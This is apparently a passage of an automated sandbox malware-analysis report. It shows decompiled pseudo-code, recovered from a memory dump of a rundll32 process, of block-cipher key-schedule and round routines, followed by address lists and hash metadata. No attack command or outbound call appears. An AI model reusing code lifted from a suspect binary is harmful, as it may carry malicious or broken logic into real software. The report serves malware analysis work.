                                        				r13d = r13d | r15d >> 0x00000002;
                                        				 *(__r8 + 0x58) = r15d;
                                        				r15d = r15d << 0x1e;
                                        				r15d = r15d | _t722 >> 0x00000002;
                                        				_t724 = _t722 << 0x0000001e | r12d >> 0x00000002;
                                        				 *(__r8 + 0xa0) = r12d;
                                        				 *(__r8 + 0xac) = _t724;
                                        				 *(__r8 + 0xa4) = r13d;
                                        				r13d = r13d << 0x13;
                                        				 *(__r8 + 0xa8) = r15d;
                                        				 *(__r8 + 0x100) = r15d >> 0x0000000d | r13d;
                                        				r15d = r15d << 0x13;
                                        				 *(__r8 + 0x104) = _t724 >> 0x0000000d | r15d;
                                        				r12d = r12d << 0x13;
                                        				r12d = r12d | r13d >> 0x0000000d;
                                        				 *(__r8 + 0x108) = _t724 << 0x00000013 | r12d >> 0x0000000d;
                                        				 *(__r8 + 0x10c) = r12d;
                                        				r8d = _t686;
                                        				_t688 = _t686 << 0x0000000f | _t523 >> 0x00000011;
                                        				r11d = r11d << 0xf;
                                        				r10d = _t688;
                                        				 *(__r8 + 0x2c) = _t688;
                                        				_t587 = _t682 >> 0x00000011 | _t523 << 0x0000000f;
                                        				 *(__r8 + 0x20) = _t587;
                                        				_t690 = _t688 << 0x0000000f | _t587 >> 0x00000011;
                                        				r10d = r10d >> 0x11;
                                        				r8d = r8d >> 0x11;
                                        				r8d = r8d | r11d;
                                        				_t664 = r11d >> 0x00000011 | _t682 << 0x0000000f;
                                        				 *(__r8 + 0x4c) = _t690;
                                        				r11d = _t664;
                                        				 *(__r8 + 0x24) = _t664;
                                        				r9d = r8d;
                                        				r9d = r9d >> 0x11;
                                        				r9d = r9d | _t664 << 0x0000000f;
                                        				r11d = r11d >> 0x11;
                                        				r11d = r11d | _t587 << 0x0000000f;
                                        				 *(__r8 + 0x44) = r9d;
                                        				 *(__r8 + 0x40) = r11d;
                                        				r11d = r11d << 0x1e;
                                        				r11d = r11d | r9d >> 0x00000002;
                                        				r9d = r9d << 0x1e;
                                        				 *(__r8 + 0x28) = r8d;
                                        				r8d = r8d << 0xf;
                                        				r10d = r10d | r8d;
                                        				 *(__r8 + 0x90) = r11d;
                                        				 *(__r8 + 0x48) = r10d;
                                        				r9d = r9d | r10d >> 0x00000002;
                                        				r10d = r10d << 0x1e;
                                        				 *(__r8 + 0x94) = r9d;
                                        				r10d = r10d | _t690 >> 0x00000002;
                                        				_t692 = _t690 << 0x0000001e | r11d >> 0x00000002;
                                        				 *(__r8 + 0x98) = r10d;
                                        				 *(__r8 + 0x9c) = _t692;
                                        				 *(__r8 + 0xd0) = r10d >> 0x0000001e | (0xf3177b70 ^ _t798) * 0x00000004;
                                        				 *(__r8 + 0xd4) = _t692 >> 0x0000001e | __r10 * 0x00000004;
                                        				 *(__r8 + 0xd8) = __rsi * 0x00000004 | r11d >> 0x0000001e;
                                        				_t599 =  *(__r8 + 0x34);
                                        				_t668 =  *(__r8 + 0x38);
                                        				 *(__r8 + 0xdc) = 0x87bcc5dedc0 | r9d >> 0x0000001e;
                                        				_t479 =  *(__r8 + 0x30);
                                        				r11d =  *(__r8 + 0x3c);
                                        				r8d = _t479;
                                        				r10d = r11d;
                                        				r11d = r11d << 0xf;
                                        				r9d = _t668;
                                        				r9d = r9d >> 0x11;
                                        				r9d = r9d | _t599 << 0x0000000f;
                                        				_t527 = _t599 >> 0x00000011 | _t479 << 0x0000000f;
                                        				r10d = r10d >> 0x11;
                                        				r10d = r10d | _t668 << 0x0000000f;
                                        				 *(__r8 + 0x30) = _t527;
                                        				_t529 = _t527 << 0x0000001e | r9d >> 0x00000002;
                                        				r8d = r8d >> 0x11;
                                        				r11d = r11d | r8d;
                                        				 *(__r8 + 0x34) = r9d;
                                        				 *(__r8 + 0x3c) = r11d;
                                        				r9d = r9d << 0x1e;
                                        				r9d = r9d | r10d >> 0x00000002;
                                        				 *(__r8 + 0x38) = r10d;
                                        				r10d = r10d << 0x1e;
                                        				r10d = r10d | r11d >> 0x00000002;
                                        				r11d = r11d << 0x1e;
                                        				r11d = r11d | _t527 >> 0x00000002;
                                        				 *(__r8 + 0x74) = r9d;
                                        				 *(__r8 + 0x7c) = r11d;
                                        				 *(__r8 + 0xc8) = r11d;
                                        				 *(__r8 + 0xc0) = r9d;
                                        				r9d = r9d << 0x11;
                                        				 *(__r8 + 0x70) = _t529;
                                        				r9d =  *(__r8 + 8);
                                        				 *(__r8 + 0xe0) = r10d >> 0x0000000f | r9d;
                                        				r11d = r11d << 0x11;
                                        				 *(__r8 + 0xcc) = _t529;
                                        				r9d = r9d << 0xd;
                                        				 *(__r8 + 0x78) = r10d;
                                        				 *(__r8 + 0xc4) = r10d;
                                        				r10d = r10d << 0x11;
                                        				 *(__r8 + 0xe4) = r11d >> 0x0000000f | r10d;
                                        				r11d = r11d | _t529 >> 0x0000000f;
                                        				_t495 =  *(__r8 + 4);
                                        				 *(__r8 + 0xe8) = r11d;
                                        				r11d =  *(__r8 + 0xc);
                                        				r8d = r11d;
                                        				r8d = r8d >> 0x13;
                                        				_t672 = r9d >> 0x00000013 | _t495 << 0x0000000d;
                                        				r8d = r8d | r9d;
                                        				 *(__r8 + 0xec) = _t529 << 0x00000011 | r9d >> 0x0000000f;
                                        				_t532 =  *__r8;
                                        				r11d = r11d << 0xd;
                                        				r9d = r8d;
                                        				r11d = r11d | _t532 >> 0x00000013;
                                        				 *(__r8 + 0x60) = _t672;
                                        				_t534 = _t532 << 0x0000000d | _t495 >> 0x00000013;
                                        				 *(__r8 + 0x68) = r11d;
                                        				 *(__r8 + 0x64) = r8d;
                                        				r8d = r8d << 0xf;
                                        				 *(__r8 + 0x6c) = _t534;
                                        				_t536 = _t534 << 0x0000000f | _t672 >> 0x00000011;
                                        				r9d = r9d >> 0x11;
                                        				r9d = r9d | _t672 << 0x0000000f;
                                        				 *(__r8 + 0x8c) = _t536;
                                        				 *(__r8 + 0x80) = r9d;
                                        				_t676 = r11d >> 0x00000011 | r8d;
                                        				r11d = r11d << 0xf;
                                        				r10d = _t676;
                                        				r11d = r11d | _t534 >> 0x00000011;
                                        				 *(__r8 + 0x84) = _t676;
                                        				r8d = r11d;
                                        				r8d = r8d >> 0xf;
                                        				r8d = r8d | _t676 << 0x00000011;
                                        				 *(__r8 + 0x88) = r11d;
                                        				r11d = r11d << 0x11;
                                        				r11d = r11d | _t536 >> 0x0000000f;
                                        				_t538 = _t536 << 0x00000011 | r9d >> 0x0000000f;
                                        				r10d = r10d >> 0xf;
                                        				r9d = r9d << 0x11;
                                        				r10d = r10d | r9d;
                                        				 *(__r8 + 0xb0) = r10d;
                                        				 *(__r8 + 0xb4) = r8d;
                                        				 *(__r8 + 0xf0) = r11d >> 0x0000001e | _t829 * 0x00000004;
                                        				 *(__r8 + 0xb8) = r11d;
                                        				 *(__r8 + 0xf4) = 0x87bcc5dedc0 | _t538 >> 0x0000001e;
                                        				 *(__r8 + 0xf8) = r10d >> 0x0000001e | 0x87bcc5dedc0;
                                        				 *(__r8 + 0xfc) = __r10 * 0x00000004 | r8d >> 0x0000001e;
                                        				 *(__r8 + 0xbc) = _t538;
                                        				return 4;
                                        			}
                                        0x21ef3097596
                                        0x21ef309759e
                                        0x21ef30975aa
                                        0x21ef30975b2
                                        0x21ef30975b5
                                        0x21ef30975bc
                                        0x21ef30975c5
                                        0x21ef30975cc
                                        0x21ef30975d1
                                        0x21ef30975e2
                                        0x21ef30975fb
                                        0x21ef30975ff
                                        0x21ef3097607
                                        0x21ef309760f
                                        0x21ef3097617
                                        0x21ef3097624
                                        0x21ef3097645
                                        0x21ef3097657
                                        0x21ef309765f
                                        0x21ef3097663
                                        0x21ef309766f
                                        0x21ef3097673
                                        0x21ef309767c
                                        0x21ef309767f
                                        0x21ef3097689
                                        0x21ef3097693
                                        0x21ef3097699
                                        0x21ef309769c
                                        0x21ef30976b5
                                        0x21ef30976b7
                                        0x21ef30976bb
                                        0x21ef30976be
                                        0x21ef30976c5
                                        0x21ef30976c9
                                        0x21ef30976cd
                                        0x21ef30976d1
                                        0x21ef30976d4
                                        0x21ef30976d8
                                        0x21ef30976db
                                        0x21ef30976df
                                        0x21ef30976e3
                                        0x21ef30976e7
                                        0x21ef30976ea
                                        0x21ef30976ee
                                        0x21ef30976f1
                                        0x21ef30976f5
                                        0x21ef30976f8
                                        0x21ef30976ff
                                        0x21ef3097702
                                        0x21ef3097706
                                        0x21ef3097710
                                        0x21ef3097714
                                        0x21ef3097717
                                        0x21ef309771d
                                        0x21ef3097724
                                        0x21ef309772a
                                        0x21ef309772c
                                        0x21ef3097733
                                        0x21ef3097737
                                        0x21ef309773e
                                        0x21ef3097742
                                        0x21ef3097748
                                        0x21ef309774b
                                        0x21ef3097755
                                        0x21ef3097758
                                        0x21ef309775c
                                        0x21ef309775f
                                        0x21ef3097763
                                        0x21ef3097767
                                        0x21ef309776d
                                        0x21ef309776f
                                        0x21ef3097773
                                        0x21ef3097778
                                        0x21ef309777c
                                        0x21ef3097784
                                        0x21ef309778b
                                        0x21ef309778e
                                        0x21ef3097797
                                        0x21ef3097799
                                        0x21ef309779d
                                        0x21ef30977a1
                                        0x21ef30977ad
                                        0x21ef30977b1
                                        0x21ef30977b7
                                        0x21ef30977bb
                                        0x21ef30977be
                                        0x21ef30977c1
                                        0x21ef30977cf
                                        0x21ef30977d2
                                        0x21ef30977d9
                                        0x21ef30977ea
                                        0x21ef30977f5
                                        0x21ef30977f8
                                        0x21ef30977fa
                                        0x21ef3097804
                                        0x21ef3097811
                                        0x21ef3097818
                                        0x21ef309781c
                                        0x21ef3097823
                                        0x21ef3097834
                                        0x21ef3097843
                                        0x21ef3097847
                                        0x21ef309785b
                                        0x21ef309785d
                                        0x21ef3097861
                                        0x21ef3097867
                                        0x21ef309786b
                                        0x21ef309786e
                                        0x21ef3097872
                                        0x21ef3097878
                                        0x21ef309787e
                                        0x21ef3097880
                                        0x21ef3097887
                                        0x21ef3097893
                                        0x21ef3097895
                                        0x21ef309789c
                                        0x21ef30978a3
                                        0x21ef30978a6
                                        0x21ef30978ac
                                        0x21ef30978b3
                                        0x21ef30978bc
                                        0x21ef30978be
                                        0x21ef30978c2
                                        0x21ef30978c9
                                        0x21ef30978cd
                                        0x21ef30978d3
                                        0x21ef30978e3
                                        0x21ef30978e5
                                        0x21ef30978ec
                                        0x21ef30978f3
                                        0x21ef30978f6
                                        0x21ef30978f9
                                        0x21ef30978fd
                                        0x21ef3097903
                                        0x21ef3097905
                                        0x21ef309790b
                                        0x21ef3097912
                                        0x21ef309791b
                                        0x21ef309791f
                                        0x21ef3097928
                                        0x21ef309792a
                                        0x21ef3097930
                                        0x21ef309793a
                                        0x21ef3097940
                                        0x21ef3097942
                                        0x21ef309794c
                                        0x21ef3097956
                                        0x21ef3097959
                                        0x21ef309795d
                                        0x21ef3097963
                                        0x21ef3097967
                                        0x21ef309796a
                                        0x21ef3097971
                                        0x21ef3097974
                                        0x21ef309797b
                                        0x21ef309797e
                                        0x21ef3097982
                                        0x21ef3097988
                                        0x21ef309798a
                                        0x21ef3097994
                                        0x21ef30979a1
                                        0x21ef30979ae
                                        0x21ef30979ba
                                        0x21ef30979c1
                                        0x21ef30979c8
                                        0x21ef30979cf
                                        0x21ef30979dc
                                        0x21ef30979ea
                                        0x21ef30979f1
                                        0x21ef30979f6
                                        0x21ef3097a01
                                        0x21ef3097a05
                                        0x21ef3097a09
                                        0x21ef3097a0d
                                        0x21ef3097a10
                                        0x21ef3097a13
                                        0x21ef3097a1a
                                        0x21ef3097a21
                                        0x21ef3097a29
                                        0x21ef3097a3c
                                        0x21ef3097a40
                                        0x21ef3097a48
                                        0x21ef3097a4c
                                        0x21ef3097a54
                                        0x21ef3097a5c
                                        0x21ef3097a5f
                                        0x21ef3097a6c
                                        0x21ef3097a86
                                        0x21ef3097a8a
                                        0x21ef3097a92
                                        0x21ef3097a9a
                                        0x21ef3097aa6
                                        0x21ef3097aaa
                                        0x21ef3097aae
                                        0x21ef3097ab7
                                        0x21ef3097ac0
                                        0x21ef3097ac7
                                        0x21ef3097ad6
                                        0x21ef3097add
                                        0x21ef3097af7
                                        0x21ef3097afb
                                        0x21ef3097b03
                                        0x21ef3097b0b
                                        0x21ef3097b13
                                        0x21ef3097b20
                                        0x21ef3097b41
                                        0x21ef3097b49
                                        0x21ef3097b54
                                        0x21ef3097b63
                                        0x21ef3097b67
                                        0x21ef3097b73
                                        0x21ef3097b7d
                                        0x21ef3097b80
                                        0x21ef3097b83
                                        0x21ef3097b8a
                                        0x21ef3097b94
                                        0x21ef3097b97
                                        0x21ef3097ba4
                                        0x21ef3097ba7
                                        0x21ef3097bae
                                        0x21ef3097bb5
                                        0x21ef3097bb8
                                        0x21ef3097bbe
                                        0x21ef3097bc5
                                        0x21ef3097bcb
                                        0x21ef3097bcd
                                        0x21ef3097bd4
                                        0x21ef3097bdb
                                        0x21ef3097be2
                                        0x21ef3097beb
                                        0x21ef3097bf2
                                        0x21ef3097bf5
                                        0x21ef3097bfb
                                        0x21ef3097c02
                                        0x21ef3097c08
                                        0x21ef3097c0a
                                        0x21ef3097c14
                                        0x21ef3097c24
                                        0x21ef3097c2b
                                        0x21ef3097c32
                                        0x21ef3097c39
                                        0x21ef3097c45
                                        0x21ef3097c4f
                                        0x21ef3097c5e
                                        0x21ef3097c62
                                        0x21ef3097c65
                                        0x21ef3097c6e
                                        0x21ef3097c78
                                        0x21ef3097c84
                                        0x21ef3097c86
                                        0x21ef3097c8d
                                        0x21ef3097c90
                                        0x21ef3097c99
                                        0x21ef3097ca0
                                        0x21ef3097ca7
                                        0x21ef3097cac
                                        0x21ef3097cb0
                                        0x21ef3097cb4
                                        0x21ef3097cba
                                        0x21ef3097cbc
                                        0x21ef3097cc0
                                        0x21ef3097cc3
                                        0x21ef3097cca
                                        0x21ef3097ccd
                                        0x21ef3097cd1
                                        0x21ef3097cd4
                                        0x21ef3097cd8
                                        0x21ef3097cdb
                                        0x21ef3097ce2
                                        0x21ef3097cef
                                        0x21ef3097cf3
                                        0x21ef3097cf6
                                        0x21ef3097cfa
                                        0x21ef3097cfe
                                        0x21ef3097d02
                                        0x21ef3097d05
                                        0x21ef3097d0f
                                        0x21ef3097d16
                                        0x21ef3097d19
                                        0x21ef3097d1f
                                        0x21ef3097d2c
                                        0x21ef3097d32
                                        0x21ef3097d3f
                                        0x21ef3097d49
                                        0x21ef3097d5d
                                        0x21ef3097d71
                                        0x21ef3097d8b
                                        0x21ef3097d92
                                        0x21ef3097d96
                                        0x21ef3097d9a
                                        0x21ef3097da1
                                        0x21ef3097da5
                                        0x21ef3097da9
                                        0x21ef3097daf
                                        0x21ef3097db4
                                        0x21ef3097dbb
                                        0x21ef3097dbe
                                        0x21ef3097dc2
                                        0x21ef3097dc8
                                        0x21ef3097dca
                                        0x21ef3097dd7
                                        0x21ef3097ddc
                                        0x21ef3097de6
                                        0x21ef3097de8
                                        0x21ef3097dec
                                        0x21ef3097def
                                        0x21ef3097df3
                                        0x21ef3097dfd
                                        0x21ef3097e01
                                        0x21ef3097e04
                                        0x21ef3097e0b
                                        0x21ef3097e12
                                        0x21ef3097e15
                                        0x21ef3097e19
                                        0x21ef3097e1c
                                        0x21ef3097e23
                                        0x21ef3097e27
                                        0x21ef3097e37
                                        0x21ef3097e3e
                                        0x21ef3097e45
                                        0x21ef3097e49
                                        0x21ef3097e50
                                        0x21ef3097e5d
                                        0x21ef3097e61
                                        0x21ef3097e6b
                                        0x21ef3097e6f
                                        0x21ef3097e73
                                        0x21ef3097e7a
                                        0x21ef3097e81
                                        0x21ef3097e8d
                                        0x21ef3097e93
                                        0x21ef3097e9b
                                        0x21ef3097ea2
                                        0x21ef3097ea6
                                        0x21ef3097eac
                                        0x21ef3097eb0
                                        0x21ef3097eb2
                                        0x21ef3097eb5
                                        0x21ef3097ebc
                                        0x21ef3097ec4
                                        0x21ef3097ecb
                                        0x21ef3097ece
                                        0x21ef3097ed1
                                        0x21ef3097ed8
                                        0x21ef3097eda
                                        0x21ef3097ee0
                                        0x21ef3097eef
                                        0x21ef3097ef3
                                        0x21ef3097efa
                                        0x21ef3097efc
                                        0x21ef3097f00
                                        0x21ef3097f03
                                        0x21ef3097f0d
                                        0x21ef3097f1d
                                        0x21ef3097f20
                                        0x21ef3097f24
                                        0x21ef3097f27
                                        0x21ef3097f2a
                                        0x21ef3097f34
                                        0x21ef3097f39
                                        0x21ef3097f40
                                        0x21ef3097f43
                                        0x21ef3097f4d
                                        0x21ef3097f51
                                        0x21ef3097f57
                                        0x21ef3097f59
                                        0x21ef3097f65
                                        0x21ef3097f69
                                        0x21ef3097f72
                                        0x21ef3097f7e
                                        0x21ef3097f85
                                        0x21ef3097f9b
                                        0x21ef3097fa2
                                        0x21ef3097fc2
                                        0x21ef3097fc9
                                        0x21ef3097fe4
                                        0x21ef3097ff8

                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d2ea031389256458ddc466e3bc3939cc54b08c4a8a8e5f3cc7529937c054e079
                                        • Instruction ID: 69eeba1bef5154cb89529dc22399d3a56b864a8ca10050a3be106e9220a94a65
                                        • Opcode Fuzzy Hash: d2ea031389256458ddc466e3bc3939cc54b08c4a8a8e5f3cc7529937c054e079
                                        • Instruction Fuzzy Hash: E072D5F26242A44FE368CF2E6819F593FD4F358789F82A219DF5A87741D638D520DB80
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b8a4eb7d73dfb797d28a3a400608f3c90c36aec19ae0905bf572d8b43a0f78ce
                                        • Instruction ID: 1c16e4b1cf229bf7b7d3dc18cb6d3958afd114a37623e10deac74865280b02b8
                                        • Opcode Fuzzy Hash: b8a4eb7d73dfb797d28a3a400608f3c90c36aec19ae0905bf572d8b43a0f78ce
                                        • Instruction Fuzzy Hash: C742D6B3B380A00BD369CB3DE852B697EE0B355348B485428F796D3E41E53DEA149B54
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 99%
                                        			E0000021E21EF30653C0(signed int __rax, long long __rbx, signed int __rcx, signed int __rdx, long long __rdi, long long __rsi, void* __r11) {
                                        				signed int _t694;
                                        				signed int _t698;
                                        				unsigned int _t700;
                                        				unsigned int _t704;
                                        				signed int _t706;
                                        				signed int _t710;
                                        				signed int _t817;
                                        				unsigned int _t819;
                                        				unsigned int _t823;
                                        				signed int _t825;
                                        				unsigned int _t829;
                                        				signed int _t831;
                                        				signed int _t834;
                                        				unsigned int _t836;
                                        				unsigned int _t840;
                                        				signed int _t842;
                                        				signed int _t846;
                                        				unsigned int _t848;
                                        				unsigned int _t856;
                                        				signed int _t858;
                                        				signed int _t862;
                                        				unsigned int _t864;
                                        				unsigned int _t868;
                                        				signed int _t870;
                                        				long long _t882;
                                        				void* _t884;
                                        				void* _t889;
                                        
                                        				 *((long long*)(_t884 + 8)) = __rbx;
                                        				 *((long long*)(_t884 + 0x10)) = _t882;
                                        				 *((long long*)(_t884 + 0x18)) = __rsi;
                                        				 *((long long*)(_t884 + 0x20)) = __rdi;
                                        				_push(_t889);
                                        				r11d =  *(__rcx + 4) & 0x000000ff;
                                        				r11d = r11d << 8;
                                        				_t817 = ((( *__rcx & 0x000000ff) << 0x00000008 |  *(__rcx + 1) & 0x000000ff) << 0x00000008 |  *(__rcx + 2) & 0x000000ff) << 0x00000008 |  *(__rcx + 3) & 0x000000ff;
                                        				r11d = r11d |  *(__rcx + 5) & 0x000000ff;
                                        				r11d = r11d << 8;
                                        				r11d = r11d |  *(__rcx + 6) & 0x000000ff;
                                        				r11d = r11d << 8;
                                        				r9d = __rdi + 0x61c88647;
                                        				r11d = r11d |  *(__rcx + 7) & 0x000000ff;
                                        				r10d = r11d;
                                        				_t856 = ((( *(__rcx + 8) & 0x000000ff) << 0x00000008 |  *(__rcx + 9) & 0x000000ff) << 0x00000008 |  *(__rcx + 0xa) & 0x000000ff) << 0x00000008 |  *(__rcx + 0xb) & 0x000000ff;
                                        				r9d = r9d + _t856;
                                        				_t694 = ((( *(__rcx + 0xc) & 0x000000ff) << 0x00000008 |  *(__rcx + 0xd) & 0x000000ff) << 0x00000008 |  *(__rcx + 0xe) & 0x000000ff) << 0x00000008 |  *(__rcx + 0xf) & 0x000000ff;
                                        				r10d = r10d - _t694;
                                        				r10d = r10d - 0x61c88647;
                                        				r8d =  *(0xf3171ff0 + 0xc00 + __rdx * 4);
                                        				r8d = r8d ^  *(0xf3171ff0 + 0x800 + __rcx * 4);
                                        				r8d = r8d ^  *(0xf3171ff0 + 0x400 + __rcx * 4);
                                        				r8d = r8d ^  *(0xf3171ff0 + __rax * 4);
                                        				 *__rdx = r8d;
                                        				r8d =  *(0xf3171ff0 + 0xc00 + __rdx * 4);
                                        				r8d = r8d ^  *(0xf3171ff0 + 0x800 + __rcx * 4);
                                        				r8d = r8d ^  *(0xf3171ff0 + 0x400 + __rcx * 4);
                                        				r8d = r8d ^  *(0xf3171ff0 + __rax * 4);
                                        				 *(__rdx + 4) = r8d;
                                        				_t834 = r11d << 0x00000018 ^ _t817 >> 0x00000008;
                                        				r11d = r11d >> 8;
                                        				_t819 = _t817 << 0x00000018 ^ r11d;
                                        				r11d = _t694;
                                        				r11d = r11d >> 0x18;
                                        				r10d = _t819;
                                        				r10d = r10d - _t694;
                                        				r9d = __rsi - 0x3c6ef373;
                                        				r9d = r9d + _t856;
                                        				r10d = r10d + 0x3c6ef373;
                                        				r8d =  *(0xf3171ff0 + 0xc00 + __rdx * 4);
                                        				r8d = r8d ^  *(0xf3171ff0 + 0x800 + __rcx * 4);
                                        				r9d = __rsi - 0x78dde6e6;
                                        				r8d = r8d ^  *(0xf3171ff0 + 0x400 + __rcx * 4);
                                        				r8d = r8d ^  *(0xf3171ff0 + __rax * 4);
                                        				 *(__rdx + 8) = r8d;
                                        				r8d =  *(0xf3171ff0 + 0xc00 + __rdx * 4);
                                        				r8d = r8d ^  *(0xf3171ff0 + 0x800 + __rcx * 4);
                                        				r10d = _t819;
                                        				r8d = r8d ^  *(0xf3171ff0 + 0x400 + __rcx * 4);
                                        				r8d = r8d ^  *(0xf3171ff0 + __rax * 4);
                                        				r11d = r11d ^ _t856 << 0x00000008;
                                        				 *(__rdx + 0xc) = r8d;
                                        				r9d = r9d + r11d;
                                        				_t858 = _t856 >> 0x00000018 ^ _t694 << 0x00000008;
                                        				r10d = r10d - _t858;
                                        				r10d = r10d + 0x78dde6e6;
                                        				r8d =  *(0xf3171ff0 + 0xc00 + __rdx * 4);
                                        				r8d = r8d ^  *(0xf3171ff0 + 0x800 + __rcx * 4);
                                        				r8d = r8d ^  *(0xf3171ff0 + 0x400 + __rcx * 4);
                                        				r8d = r8d ^  *(0xf3171ff0 + __rax * 4);
                                        				 *(__rdx + 0x10) = r8d;
                                        				r8d =  *(0xf3171ff0 + 0xc00 + __rdx * 4);
                                        				r8d = r8d ^  *(0xf3171ff0 + 0x800 + __rcx * 4);
                                        				r8d = r8d ^  *(0xf3171ff0 + 0x400 + __rcx * 4);
                                        				r8d = r8d ^  *(0xf3171ff0 + __rax * 4);
                                        				 *(__rdx + 0x14) = r8d;
                                        				_t698 = _t819 << 0x00000018 ^ _t834 >> 0x00000008;
                                        				_t836 = _t834 << 0x00000018 ^ _t819 >> 0x00000008;
                                        				r10d = _t836;
                                        				r10d = r10d - _t858;
                                        				r10d = r10d - 0xe443234;
                                        				r9d = __rbx + 0xe443234;
                                        				r9d = r9d + r11d;
                                        				r8d =  *(0xf3171ff0 + 0xc00 + __rdx * 4);
                                        				r8d = r8d ^  *(0xf3171ff0 + 0x800 + __rcx * 4);
                                        				r9d = __rbx + 0x1c886467;
                                        				r8d = r8d ^  *(0xf3171ff0 + 0x400 + __rcx * 4);
                                        				r8d = r8d ^  *(0xf3171ff0 + __rax * 4);
                                        				 *(__rdx + 0x18) = r8d;
                                        				r8d =  *(0xf3171ff0 + 0xc00 + __rdx * 4);
                                        				r8d = r8d ^  *(0xf3171ff0 + 0x800 + __rcx * 4);
                                        				r10d = _t836;
                                        				r8d = r8d ^  *(0xf3171ff0 + 0x400 + __rcx * 4);
                                        				r8d = r8d ^  *(0xf3171ff0 + __rax * 4);
                                        				_t823 = _t858 >> 0x00000018 ^ r11d << 0x00000008;
                                        				 *(__rdx + 0x1c) = r8d;
                                        				r9d = r9d + _t823;
                                        				r11d = r11d >> 0x18;
                                        				r11d = r11d ^ _t858 << 0x00000008;
                                        				r10d = r10d - r11d;
                                        				r10d = r10d - 0x1c886467;
                                        				r8d =  *(0xf3171ff0 + 0xc00 + __rdx * 4);
                                        				r8d = r8d ^  *(0xf3171ff0 + 0x800 + __rcx * 4);
                                        				r8d = r8d ^  *(0xf3171ff0 + 0x400 + __rcx * 4);
                                        				r8d = r8d ^  *(0xf3171ff0 + __rax * 4);
                                        				 *(__rdx + 0x20) = r8d;
                                        				r8d =  *(0xf3171ff0 + 0xc00 + __rdx * 4);
                                        				r8d = r8d ^  *(0xf3171ff0 + 0x800 + __rcx * 4);
                                        				r8d = r8d ^  *(0xf3171ff0 + 0x400 + __rcx * 4);
                                        				r8d = r8d ^  *(0xf3171ff0 + __rax * 4);
                                        				_t862 = _t836 << 0x00000018 ^ _t698 >> 0x00000008;
                                        				 *(__rdx + 0x24) = r8d;
                                        				_t700 = _t698 << 0x00000018 ^ _t836 >> 0x00000008;
                                        				r10d = _t700;
                                        				r10d = r10d - r11d;
                                        				r9d = _t882 + 0x3910c8cd;
                                        				r9d = r9d + _t823;
                                        				r11d = r11d << 8;
                                        				r10d = r10d - 0x3910c8cd;
                                        				r8d =  *(0xf3171ff0 + 0xc00 + __rdx * 4);
                                        				r8d = r8d ^  *(0xf3171ff0 + 0x800 + __rcx * 4);
                                        				r9d = _t882 + 0x72219199;
                                        				r8d = r8d ^  *(0xf3171ff0 + 0x400 + __rcx * 4);
                                        				r8d = r8d ^  *(0xf3171ff0 + __rax * 4);
                                        				 *(__rdx + 0x28) = r8d;
                                        				r8d =  *(0xf3171ff0 + 0xc00 + __rdx * 4);
                                        				r8d = r8d ^  *(0xf3171ff0 + 0x800 + __rcx * 4);
                                        				r10d = _t700;
                                        				r8d = r8d ^  *(0xf3171ff0 + 0x400 + __rcx * 4);
                                        				r8d = r8d ^  *(0xf3171ff0 + __rax * 4);
                                        				_t840 = r11d >> 0x00000018 ^ _t823 << 0x00000008;
                                        				 *(__rdx + 0x2c) = r8d;
                                        				r9d = r9d + _t840;
                                        				_t825 = _t823 >> 0x00000018 ^ r11d;
                                        				r10d = r10d - _t825;
                                        				r10d = r10d - 0x72219199;
                                        				r8d =  *(0xf3171ff0 + 0xc00 + __rdx * 4);
                                        				r8d = r8d ^  *(0xf3171ff0 + 0x800 + __rcx * 4);
                                        				r8d = r8d ^  *(0xf3171ff0 + 0x400 + __rcx * 4);
                                        				r8d = r8d ^  *(0xf3171ff0 + __rax * 4);
                                        				 *(__rdx + 0x30) = r8d;
                                        				r8d =  *(0xf3171ff0 + 0xc00 + __rdx * 4);
                                        				r11d = _t700;
                                        				r11d = r11d << 0x18;
                                        				r8d = r8d ^  *(0xf3171ff0 + 0x800 + __rcx * 4);
                                        				r8d = r8d ^  *(0xf3171ff0 + 0x400 + __rcx * 4);
                                        				r8d = r8d ^  *(0xf3171ff0 + __rax * 4);
                                        				r11d = r11d ^ _t862 >> 0x00000008;
                                        				 *(__rdx + 0x34) = r8d;
                                        				_t864 = _t862 << 0x00000018 ^ _t700 >> 0x00000008;
                                        				r10d = _t864;
                                        				r10d = r10d - _t825;
                                        				r9d = __r11 - 0x1bbcdccf;
                                        				r9d = r9d + _t840;
                                        				r10d = r10d + 0x1bbcdccf;
                                        				r8d =  *(0xf3171ff0 + 0xc00 + __rdx * 4);
                                        				r8d = r8d ^  *(0xf3171ff0 + 0x800 + __rcx * 4);
                                        				r9d = __r11 - 0x3779b99e;
                                        				r8d = r8d ^  *(0xf3171ff0 + 0x400 + __rcx * 4);
                                        				r8d = r8d ^  *(0xf3171ff0 + __rax * 4);
                                        				 *(__rdx + 0x38) = r8d;
                                        				r8d =  *(0xf3171ff0 + 0xc00 + __rdx * 4);
                                        				r8d = r8d ^  *(0xf3171ff0 + 0x800 + __rcx * 4);
                                        				r10d = _t864;
                                        				r8d = r8d ^  *(0xf3171ff0 + 0x400 + __rcx * 4);
                                        				r8d = r8d ^  *(0xf3171ff0 + __rax * 4);
                                        				_t704 = _t825 >> 0x00000018 ^ _t840 << 0x00000008;
                                        				 *(__rdx + 0x3c) = r8d;
                                        				r9d = r9d + _t704;
                                        				_t842 = _t840 >> 0x00000018 ^ _t825 << 0x00000008;
                                        				r10d = r10d - _t842;
                                        				r10d = r10d + 0x3779b99e;
                                        				r8d =  *(0xf3171ff0 + 0xc00 + __rdx * 4);
                                        				r8d = r8d ^  *(0xf3171ff0 + 0x800 + __rcx * 4);
                                        				r8d = r8d ^  *(0xf3171ff0 + 0x400 + __rcx * 4);
                                        				r8d = r8d ^  *(0xf3171ff0 + __rax * 4);
                                        				 *(__rdx + 0x40) = r8d;
